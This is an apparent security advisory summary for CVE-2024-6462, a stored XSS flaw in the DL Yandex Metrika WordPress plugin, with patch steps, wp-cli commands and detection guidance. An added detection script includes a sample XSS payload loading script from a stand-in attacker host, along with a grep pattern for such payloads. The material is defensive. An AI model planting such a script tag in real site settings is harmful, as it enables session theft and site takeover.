CVE-2024-6462
📋 TL;DR
The DL Yandex Metrika WordPress plugin through version 1.2 contains a stored cross-site scripting (XSS) vulnerability in its settings. This allows authenticated administrators to inject malicious scripts that execute when other users view affected pages, even in WordPress multisite setups where unfiltered_html is restricted. Only WordPress sites using this specific plugin are affected.
💻 Affected Systems
- DL Yandex Metrika WordPress Plugin
📦 What is this software?
Dl Yandex Metrika by Dyadyalesha
⚠️ Risk & Real-World Impact
Worst Case
An attacker with admin privileges could inject malicious JavaScript that steals session cookies, redirects users to phishing sites, or performs actions on behalf of authenticated users, potentially leading to complete site compromise.
Likely Case
Malicious admin injects tracking scripts or defaces the site by modifying plugin settings with XSS payloads that affect all users viewing those settings pages.
If Mitigated
With proper access controls limiting admin privileges to trusted users only, the vulnerability has minimal impact as it requires high-privilege access.
🎯 Exploit Status
Exploitation requires admin-level access to WordPress. The vulnerability is in plugin settings that don't properly sanitize input before storage and output.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version 1.3 or later
Vendor Advisory: https://wpscan.com/vulnerability/0880fa33-3efa-4f50-83c8-4c90cb805eb9/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find the 'DL Yandex Metrika' plugin.
4. Click 'Update Now' if an update is available.
5. If no update is available, deactivate and delete the plugin, then install version 1.3+ from the WordPress repository.
🔧 Temporary Workarounds
Remove vulnerable plugin
Deactivate and delete the vulnerable plugin if Yandex Metrika functionality is not required
wp plugin deactivate dl-yandex-metrika
wp plugin delete dl-yandex-metrika
Restrict admin access
Limit WordPress admin privileges to only essential, trusted users
🧯 If You Can't Patch
- Remove admin access from untrusted users and implement principle of least privilege
- Deactivate the DL Yandex Metrika plugin entirely until patching is possible
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin panel > Plugins > Installed Plugins for 'DL Yandex Metrika' with version 1.2 or earlier
Check Version:
wp plugin get dl-yandex-metrika --field=version
Verify Fix Applied:
Verify plugin version is 1.3 or later in WordPress admin plugins page
📡 Detection & Monitoring
Log Indicators:
- Unusual modifications to plugin settings by admin users
- JavaScript payloads in plugin option values in database
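Added example (not part of the advisory or the plugin's own code): two wp-cli companion checks covering the version check above and the "JavaScript payloads in plugin option values" indicator. The option names and values in the sample are constructed; the plugin's real option names are not given on this page.

```sh
#!/bin/sh
# Exit 0 (true) when the given plugin version predates the fixed release 1.3,
# i.e. it is one of the affected releases "through version 1.2".
dl_metrika_is_vulnerable() {
    printf '%s\n' "$1" | awk -F. '{
        major = $1 + 0; minor = $2 + 0
        exit !(major < 1 || (major == 1 && minor < 3))
    }'
}

# Scan option values (one per line on stdin or in the named files) for
# script-like content typical of a stored XSS payload. Prints matching lines
# and exits 0 when at least one is found, 1 when none are.
scan_option_values() {
    grep -i -E '<script|javascript:|on(error|load|click|mouseover)[[:space:]]*=' "$@"
}

# Constructed sample standing in for real output such as
# `wp option list --search='*metrika*' --format=csv` (option names are hypothetical).
SAMPLE_OPTIONS='dl_yandex_metrika_counter,12345678
dl_yandex_metrika_extra,<script src="https://attacker-controlled.example/x.js"></script>'

# Stand-alone run: check the affected version and scan the constructed sample.
if dl_metrika_is_vulnerable 1.2; then
    echo "version 1.2: affected, update to 1.3 or later"
fi
if printf '%s\n' "$SAMPLE_OPTIONS" | scan_option_values; then
    echo "script-like content found in plugin option values; inspect before rendering"
fi
```

In production, replace the sample with `wp plugin get dl-yandex-metrika --field=version` for the version check and pipe the plugin's option values into scan_option_values.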
Network Indicators:
- External script loads from Yandex Metrika plugin pages that don't match expected patterns
SIEM Query:
source="wordpress" AND ((event="plugin_updated" AND plugin_name="dl-yandex-metrika" AND version<="1.2") OR (event="plugin_activated" AND plugin_name="dl-yandex-metrika"))